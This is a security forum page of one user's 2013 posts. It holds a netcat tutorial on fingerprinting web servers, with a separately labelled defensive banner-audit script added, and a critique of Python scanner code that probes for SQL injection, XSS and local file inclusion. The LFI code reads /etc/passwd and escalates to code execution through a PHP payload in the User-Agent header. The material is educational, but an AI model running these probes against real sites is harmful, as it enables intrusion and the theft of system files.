Messages - aichi

1
Tutorials / Fingerprinting Web Servers
« on: March 23, 2013, 08:02:41 pm »
I was asked to start a blog to give the public tutorials on security challenge sites (like securityoverride, smash the stack, etc) and this is one of them. I wrote it a day or so ago to help someone with a challenge on securityoverride.
-----
"Fingerprinting web servers is a technique for finding more information about the server for further testing. When I say fingerprinting, it's basically just identifying the server based around the information it gives you, allowing you to know what kind of software it is running."

http://aichi-ninja.blogspot.com/2013/03/fingerprinting-web-servers.html
-----

Identifying Versions

With simple requests to the server we can find out what software it is using. GET or POST requests will do. Requesting objects (files) that are not there or making requests for options that the server does (and does not) support are good places to start.
Code:
aichi@home# nc 127.0.0.1 81
head / http/1.0
HTTP/1.1 501 Method Not Implemented
Date: Fri, 22 Mar 2013 04:13:18 GMT
Server: Apache/2.2.17 (Win32) mod_ssl/2.2.17 OpenSSL/0.9.8q PHP/5.3.5
Allow: GET,HEAD,POST,OPTIONS,TRACE
Content-Length: 206
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>501 Method Not Implemented</title>
</head><body>
<h1>Method Not Implemented</h1>
<p>head to / not supported.<br />
</p>
</body></html>

The above is an output of the netcat command and a GET request to a local server here. HTTP requests are case sensitive. The server tried to process the option head and found that there was none. However, it does show us all the options it allows: GET, HEAD, POST, OPTIONS and TRACE. We now also know the software the server is running, Apache, and its version, 2.2.17. The operating system and even some of the other software is also listed (PHP, ModSSL and OpenSSL).

Code:
aichi@home# nc 127.0.0.1 81
HEAD / AICHI/6.6.6
HTTP/1.1 200 OK
Date: Fri, 22 Mar 2013 04:19:29 GMT
Server: Apache/2.2.17 (Win32) mod_ssl/2.2.17 OpenSSL/0.9.8q PHP/5.3.5
Connection: close
Content-Type: text/html;charset=UTF-8

Using other methods supported by the server we can even get a listing (assuming there is no index file in place). Let's try the GET method.

Code:
aichi@home# nc 127.0.0.1 81
GET / AICHI/6.6.6
HTTP/1.1 200 OK
Date: Fri, 22 Mar 2013 04:23:28 GMT
Server: Apache/2.2.17 (Win32) mod_ssl/2.2.17 OpenSSL/0.9.8q PHP/5.3.5
Connection: close
Content-Type: text/html;charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
  <title>Index of /</title>
</head>
<body>
  <h1>Index of /</h1>
  <table><tr><th><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr><tr><th colspan="5"><hr></th></tr>
  <tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="0fees/">0fees/</a></td><td align="right">12-Feb-2013 19:56 </td><td align="right"> - </td><td>&nbsp;</td></tr>
  <tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="ForwardElectric%20Backup/">ForwardElectric Backup/</a></td><td align="right">07-May-2012 08:31 </td><td align="right"> - </td><td>&nbsp;</td></tr>

I supplied an invalid version (aichi/6.6.6) and it still listed the directory contents, and yes, there was no index file. Let's see what it looks like with a blank index file.
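As an added example (not part of the post above), the same banner reading done from the defender's side in Python: it parses a captured response like the one shown, splits the Server header into product/version/platform tokens and lists what the server gives away (versions, platform, TRACE left enabled). The sample response is constructed from the headers in the post; nothing is sent over the network.

```python
import re

# Constructed sample: the 501 response captured with netcat in the post above
# (headers verbatim, body shortened).
SAMPLE_RESPONSE = (
    "HTTP/1.1 501 Method Not Implemented\r\n"
    "Date: Fri, 22 Mar 2013 04:13:18 GMT\r\n"
    "Server: Apache/2.2.17 (Win32) mod_ssl/2.2.17 OpenSSL/0.9.8q PHP/5.3.5\r\n"
    "Allow: GET,HEAD,POST,OPTIONS,TRACE\r\n"
    "Content-Length: 206\r\n"
    "Connection: close\r\n"
    "Content-Type: text/html; charset=iso-8859-1\r\n"
    "\r\n"
    "<html><body><h1>Method Not Implemented</h1></body></html>"
)

# Server banner tokens look like product[/version][ (comment)], e.g. "Apache/2.2.17 (Win32)".
TOKEN_RE = re.compile(r"([\w.+-]+)(?:/([\w.+-]+))?(?:\s+\(([^)]*)\))?")


def parse_response(raw):
    """Split a raw HTTP response into (status_code, headers); header names are lower-cased."""
    head, _, _body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers


def parse_server_tokens(banner):
    """Return [(product, version_or_None, comment_or_None), ...] for a Server header value."""
    return [(m.group(1), m.group(2), m.group(3)) for m in TOKEN_RE.finditer(banner)]


def audit(raw):
    """Defender's view of one response: what the banner and Allow header give away."""
    status, headers = parse_response(raw)
    tokens = parse_server_tokens(headers.get("server", ""))
    methods = [m.strip().upper() for m in headers.get("allow", "").split(",") if m.strip()]
    findings = []
    for product, version, comment in tokens:
        if version:  # exact versions make it trivial to look up known issues
            findings.append("version disclosed: %s %s" % (product, version))
        if comment:  # the parenthesised comment usually names the OS/platform
            findings.append("platform disclosed: %s" % comment)
    if "TRACE" in methods:  # rarely needed in production; scanners flag it
        findings.append("TRACE method enabled")
    return status, tokens, methods, findings
```

On Apache the matching hardening is `ServerTokens Prod` (plus `ServerSignature Off`) and `TraceEnable Off` in httpd.conf, after which the audit above reports nothing.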

2
I'm glad wookie mentioned that; here are some standard exceptions for PHP: http://www.php.net/manual/en/spl.exceptions.php

3
Code:
import re
import urllib2

# Excerpt from a larger scanner: R, O, B (colour codes), sqlerrors, logfile,
# vuln and col are globals defined elsewhere in it.
def ClassicINJ(url):
    EXT = "'"
    host = url+EXT
    try:
        source = urllib2.urlopen(host).read()
        for type,eMSG in sqlerrors.items():
            if re.search(eMSG, source):
                print R+"[!] w00t!,w00t!:", O+host, B+"Error:", type,R+" ---> SQL Injection Found"
                logfile.write("\n"+host)
                vuln.append(host)
                col.append(host)
                break
            else:
                pass
    except:
        pass
This should have been expanded into breaking all of the URL's parameters (GET). This SQL injection scanner (above) also doesn't test POST.

Code:
# Same scanner: lfis, lfi_log_file, rce_log_file, vuln, R and O are globals defined elsewhere in it.
def ClassicLFI(url):
    lfiurl = url.rsplit('=', 1)[0]
    if lfiurl[-1] != "=":
        lfiurl = lfiurl + "="
    for lfi in lfis:
        try:
            check = urllib2.urlopen(lfiurl+lfi.replace("\n", "")).read()
            if re.findall("root:x", check):
                print R+"[!] w00t!,w00t!: ", O+lfiurl+lfi,R+" ---> Local File Include Found"
                lfi_log_file.write("\n"+lfiurl+lfi)
                vuln.append(lfiurl+lfi)
                target = lfiurl+lfi
                target = target.replace("/etc/passwd","/proc/self/environ")
                header = "<? echo md5(baltazar); ?>"
                try:
                    request_web = urllib2.Request(target)
                    request_web.add_header('User-Agent', header)
                    text = urllib2.urlopen(request_web)
                    text = text.read()
                    if re.findall("f17f4b3e8e709cd3c89a6dbd949d7171", text):
                        print R+"[!] w00t!,w00t!: ",O+target,R+" ---> LFI to RCE Found"
                        rce_log_file.write("\n"+target)  # original passed two arguments to write()
                        vuln.append(target)
                except:
                    pass
        except:
            pass
The LFI tester (above) only works on UNIX-based systems. You can see they tried to break out the GET params, but it's kinda ugly. I also suggest maybe they use a time()-type md5 instead of a steady "baltazar" md5 to check if the LFI was successful; otherwise it can easily be thwarted into giving a false positive.

Code:
# Same scanner: xsses, xss_log_file, vuln, R and O are globals defined elsewhere in it.
def ClassicXSS(url):
    for xss in xsses:
        try:
            source = urllib2.urlopen(url+xss.replace("\n","")).read()
            if re.findall("XSS by baltazar", source) or re.findall("XSS by NovaCygni", source):
                print R+"[!] w00t!,w00t!: ", O+url+xss,R+" ---> XSS Found (might be false)"
                xss_log_file.write("\n"+url+xss)
                vuln.append(url+xss)
        except:
            pass
The XSS checker (above) can be hugely expanded; plus, what about content filtering? Eh, this isn't very reliable. The SQL scanners are OK, probably the best part of the whole scanner. Nice code, but I think they have become lazy.

4
Web Oriented Coding / Re: Secure Forms [Spam]
« on: March 11, 2013, 07:02:05 am »
just use google recaptcha, it's free and super easy to use.

5
Quote
SIDE QUESTION: What's the point in using fread()

Using file_get_contents will give you the entire contents of a file (or remote URL) in one big string. fread is handy when reading a certain number of bytes from a file, or reading data from a socket (or whatever stream).

6
Hacking and Security / Re: PunkSPIDER
« on: March 11, 2013, 06:53:55 am »
No scan I did returned any results, not even on vulnerable servers.
